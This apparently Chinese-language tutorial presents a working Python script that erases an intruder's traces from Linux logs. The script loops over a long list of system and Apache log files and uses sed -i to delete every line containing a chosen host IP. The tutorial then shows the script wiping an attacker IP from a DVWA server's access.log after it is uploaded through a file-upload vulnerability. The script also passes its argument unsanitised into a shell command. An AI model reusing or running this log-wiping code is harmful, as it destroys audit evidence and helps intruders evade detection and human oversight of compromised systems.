主要过程为定义一个log列表,含有Linux中常见的log文件,然后使用os库的path.exists()方法查看是否存在该文件,若存在则使用subprocess库调用sed命令来删除日志中与指定host相关的行以实现痕迹的清除。
先来看看Linux中sed命令的使用:
其中‘/127.0.0.1/d’中,d是指定进行删除操作,删除的内容为含有“127.0.0.1”的行,而sed命令的-i参数表示可以直接修改文件内容。确实可以看到,含有“127.0.0.1”字样的行都被删除掉了。
脚本如下:
#coding=utf-8 import os import sys import subprocess def Clear_The_Log(host): logs = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var/log/apache2/error.log.1","/usr/local/httpd/error.log","/apache/apache/message.log","/var/log/apache2/access_log","/var/log/apache2/error.log","/var/log/apache2/error_log ","/var/log/apache/access.log","/var/log/apache/access_log","/var/log/apache/error.log","/var/log/apache/error_log","/var/www/logs/error_log"," /var/www/logs/error.log"," /var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log"," /usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/usr/local/apache/logs/error_logerror_log.old","/usr/local/apache/logs/access_logaccess_log.old","/var/log/access.log","/var/log/access_log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access.log","/var/log/messages.1","/var/log/messages.2","/var/log/messages.3","/var/log/messages.4","/var/log/secure.1","/var/log/secure.2","/var/log/secure.3","/var/log/secure.3","/var/log/secure.4"] print "[*]Trying to find the logs of the Linux......" for log in logs: if os.path.exists(log): print "[+]Found the log: " + log subprocess.call("sed -i '/%s/d' %s" % (host, log), shell=True) print "[+]Clear the log successfully." def main(): try: host = sys.argv[1] if len(sys.argv) < 1: print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1" Clear_The_Log(host) except Exception, e: print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1" if __name__ == '__main__': main()
先在BT5上测试:
接着到DVWA的Web服务器上测试:
查看DVWA的Apache的access.log日志,找到物理机访问的记录:
命令:vim /var/log/apache2/access.log
然后使用输入该vim指令查找即可:/192.168.220.1
可以看到物理机即192.168.220.1的Web访问记录。
接着上传脚本,如可借用文件上传漏洞,然后执行脚本:
可以看到,脚本找到了Apache的access.log日志并对其进行了清除。
接下来进行确认,同样是查看Apache的access.log日志文件:
vim /var/log/apache2/access.log
可以看到,找不到相关的信息,确实清除掉了192.168.220.1主机相应的Web访问记录,即日志痕迹清除成功。